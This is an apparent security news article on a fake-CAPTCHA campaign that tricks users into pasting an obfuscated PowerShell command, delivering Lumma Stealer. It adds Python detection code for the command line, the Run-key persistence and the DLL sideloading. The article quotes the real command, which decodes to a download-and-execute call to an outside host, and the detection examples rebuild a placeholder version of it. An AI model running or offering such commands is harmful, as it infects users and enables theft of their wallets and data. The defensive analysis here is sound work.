A growing attack trend since the second half of 2024 involves threat actors using fake CAPTCHA challenges to trick users into executing malicious PowerShell commands and infecting their systems with dangerous malware.
These sophisticated social engineering tactics leverage users’ familiarity with legitimate CAPTCHA verification processes to deliver Lumma Stealer, an information-stealing malware capable of extracting cryptocurrency wallets and other sensitive data.
The attack begins when users are lured to malicious websites through web advertisements, search engine optimization hijacking, or redirects from compromised websites.
These malicious sites display fake CAPTCHA verification challenges that appear legitimate, often mimicking widely recognized CAPTCHA interfaces.
HP analysts noted that attackers are primarily relying on cloud hosting providers that offer free credits to new users, providing sufficient resources to run malware campaigns.
This approach helps circumvent detection because the IP addresses and domains involved usually carry a good reputation, enabling threat actors to bypass network security controls, such as web proxies, that rely on web reputation.
When users interact with these fake CAPTCHAs by clicking the “I’m not a robot” button, malicious JavaScript code executes in the background, secretly copying a PowerShell command to the user’s clipboard.
The user is then instructed to open the Windows Run prompt using the WIN+R keyboard shortcut and paste the content using CTRL+V, unknowingly executing the malicious code.
The PowerShell command is deliberately short and obfuscated with mixed-case letters. As seen in Figure 3, it appears as:
pOweRSHelL -w hiDdEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vZmlsZXpjdnNkcy5iLWNkbi5uZXQvZ2t6SGRxZmcudHh0JYAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
This command downloads and executes a much larger malicious script that can exceed 50 MB in size.
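The one-liner above has a recognisable shape in process-creation telemetry: a mixed-case powershell invocation with a hidden window, a Base64 blob passed to FromBase64String, and the result piped to iex. As an added detection example (not HP's code and not anything from the campaign), the following Python normalises the casing, decodes the Base64 argument to recover the download URL, and weights the fact that the parent process is explorer.exe, which is what a command pasted into the WIN+R Run dialog is launched from. The log-line layout, the user paths and the cdn.example.invalid URL are constructed for the example.

```python
import base64
import re

# Added example (not HP's code): flag ClickFix-style PowerShell one-liners in
# process-creation telemetry and recover the download URL hidden in the Base64 blob.

# All patterns are case-insensitive because the sample on the page mixes case
# (pOweRSHelL, hiDdEn) to defeat naive string matching.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hid(?:den)?", re.IGNORECASE)
B64_ARG = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.IGNORECASE)
IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
DOWNLOAD = re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


def decode_base64_args(cmd: str) -> list:
    """Decode every FromBase64String('...') argument found in the command line.
    The page's sample wraps UTF-8; PowerShell's own -EncodedCommand uses UTF-16LE,
    so fall back to that when the bytes are not valid UTF-8."""
    decoded = []
    for blob in B64_ARG.findall(cmd):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue  # not real Base64, nothing to recover
        try:
            decoded.append(raw.decode("utf-8"))
        except UnicodeDecodeError:
            decoded.append(raw.decode("utf-16-le", errors="replace"))
    return decoded


def analyze_command_line(cmd: str, parent_image: str = "") -> dict:
    """Score one command line; indicators are also searched in the decoded payload."""
    decoded = decode_base64_args(cmd)
    haystack = cmd + " " + " ".join(decoded)
    indicators = {
        "hidden_window": bool(HIDDEN_WINDOW.search(cmd)),
        "base64_payload": bool(decoded),
        "invoke_expression": bool(IEX.search(haystack)),
        "remote_download": bool(DOWNLOAD.search(haystack)),
        # The Run dialog is hosted by explorer.exe, so a command pasted into
        # WIN+R yields powershell.exe with explorer.exe as its parent.
        "launched_from_explorer": parent_image.lower().endswith("explorer.exe"),
    }
    return {
        "indicators": indicators,
        "score": sum(indicators.values()),
        "decoded": decoded,
        "urls": URL.findall(haystack),
    }


def scan_process_events(lines: list, threshold: int = 3) -> list:
    """Each line is 'ParentImage|Image|CommandLine'; split at most twice so the
    pipe inside the command line ('| iex') is preserved."""
    alerts = []
    for line in lines:
        parent, image, cmd = (f.strip() for f in line.split("|", 2))
        result = analyze_command_line(cmd, parent)
        if result["score"] >= threshold:
            alerts.append({"image": image, "command": cmd, **result})
    return alerts


# Constructed payload: the same shape as the page's sample, but pointing at a
# placeholder host so the example stays offline.
_PAYLOAD = base64.b64encode(
    b"iex (iwr 'https://cdn.example.invalid/payload.txt' -UseBasicParsing).Content"
).decode()

SAMPLE_EVENTS = [  # constructed process-creation records
    "C:\\Windows\\explorer.exe | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | "
    "pOweRSHelL -w hiDdEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + _PAYLOAD + "')) | iex\"",
    "C:\\Windows\\System32\\cmd.exe | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | "
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "C:\\Windows\\explorer.exe | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | "
    "powershell -w hidden -c \"Get-Date\"",
]

if __name__ == "__main__":
    for alert in scan_process_events(SAMPLE_EVENTS):
        print(alert["score"], alert["urls"], alert["decoded"])
```

Only the first constructed record crosses the threshold: it carries all five indicators, and the decoded payload yields the URL that the next stage is fetched from, which is the value worth blocking at the proxy. The third record (a hidden-window Get-Date from the Run dialog) scores two and is left alone, which is the point of scoring rather than matching on a single string.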
Infection Chain
The downloaded script checks if the malware already exists on the device and, if not, decodes a Base64 string into a ZIP archive stored in the AppData folder.
After extraction, it executes a file named Set-up.exe and creates a Registry run key named “NetUtilityApp” for persistence.
The malware uses a technique called DLL sideloading, where a legitimate signed executable loads several DLLs, one of which (StarBurn.dll) contains the malicious Lumma Stealer payload.
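The persistence and sideloading stages each leave a distinct trace on the host: a Run-key value whose target sits under a user-writable path, and a DLL loaded from the same user-writable directory as the executable that loads it. As an added example, not HP's code and not part of the campaign, the Python below triages constructed Sysmon-style events (registry value set, EventID 13; image load, EventID 7) for those two patterns and links them when the autostart entry and the sideloading host are the same executable. The value name NetUtilityApp and the file names Set-up.exe and StarBurn.dll come from the report; the user name, SID and directory layout are constructed.

```python
import ntpath  # Windows path handling that works on any host OS

# Added example (not HP's code): triage Sysmon-style registry and image-load events
# for the two traces this infection chain leaves. Field names follow Sysmon's
# (EventID 13: TargetObject/Details; EventID 7: Image/ImageLoaded/Signed).

RUN_KEY_PATHS = (
    "\\software\\microsoft\\windows\\currentversion\\run",
    "\\software\\microsoft\\windows\\currentversion\\runonce",
)
# Directories a standard user can write to; autostart targets and DLLs here are suspect.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\programdata\\", "\\users\\public\\")


def is_run_key_persistence(ev: dict) -> bool:
    """Run/RunOnce value whose target lives in a user-writable directory."""
    target = ev.get("TargetObject", "").lower()
    details = ev.get("Details", "").lower()
    return any(p in target for p in RUN_KEY_PATHS) and any(d in details for d in USER_WRITABLE)


def is_suspicious_sideload(ev: dict) -> bool:
    """Unsigned DLL loaded from the same user-writable directory as its host
    executable. The host's own signature is not part of EventID 7, so confirm
    it against the process-creation record before calling this a sideload."""
    exe = ev.get("Image", "")
    dll = ev.get("ImageLoaded", "")
    same_dir = ntpath.dirname(exe).lower() == ntpath.dirname(dll).lower()
    user_dir = any(d in dll.lower() for d in USER_WRITABLE)
    unsigned = ev.get("Signed", "").lower() != "true"
    return same_dir and user_dir and unsigned


def triage(events: list) -> dict:
    """Return the persistence targets, sideloaded DLLs, and the hosts common to both."""
    findings = {"persistence": [], "sideload": [], "linked": []}
    sideload_events = []
    for ev in events:
        if ev.get("EventID") == 13 and is_run_key_persistence(ev):
            findings["persistence"].append(ev["Details"])
        elif ev.get("EventID") == 7 and is_suspicious_sideload(ev):
            sideload_events.append(ev)
    # Link the stages: the executable registered for autostart is also the sideload host.
    persisted = {ntpath.normcase(p.strip('"')) for p in findings["persistence"]}
    for ev in sideload_events:
        findings["sideload"].append(ev["ImageLoaded"])
        if ntpath.normcase(ev["Image"]) in persisted:
            findings["linked"].append(ev["Image"])
    return findings


USER_DIR = "C:\\Users\\alice\\AppData\\Roaming\\NetUtilityApp"  # constructed
SAMPLE_EVENTS = [  # constructed Sysmon-style records
    {"EventID": 13,
     "TargetObject": "HKU\\S-1-5-21-0-0-0-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\NetUtilityApp",
     "Details": USER_DIR + "\\Set-up.exe"},
    {"EventID": 7, "Image": USER_DIR + "\\Set-up.exe",
     "ImageLoaded": USER_DIR + "\\StarBurn.dll", "Signed": "false"},
    {"EventID": 7, "Image": "C:\\Windows\\System32\\notepad.exe",
     "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll", "Signed": "true"},
    {"EventID": 13,
     "TargetObject": "HKU\\S-1-5-21-0-0-0-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "Details": "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe"},
]

if __name__ == "__main__":
    for kind, items in triage(SAMPLE_EVENTS).items():
        print(kind, items)
```

The two benign records (a System32 DLL load and a Run entry under Program Files) are not flagged, while the AppData entry and the StarBurn.dll load are, and the shared host path ties them into one finding. Treating the linked case as higher severity than either event alone is what turns two noisy heuristics into an infection-chain alert.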
The JavaScript code responsible for this attack creates a temporary text area element, copies the PowerShell command to the clipboard, and then removes the element to hide evidence of the operation.
This technique allows attackers to bypass traditional security mechanisms because a legitimate user action, rather than an exploit or a downloaded file, initiates the infection process.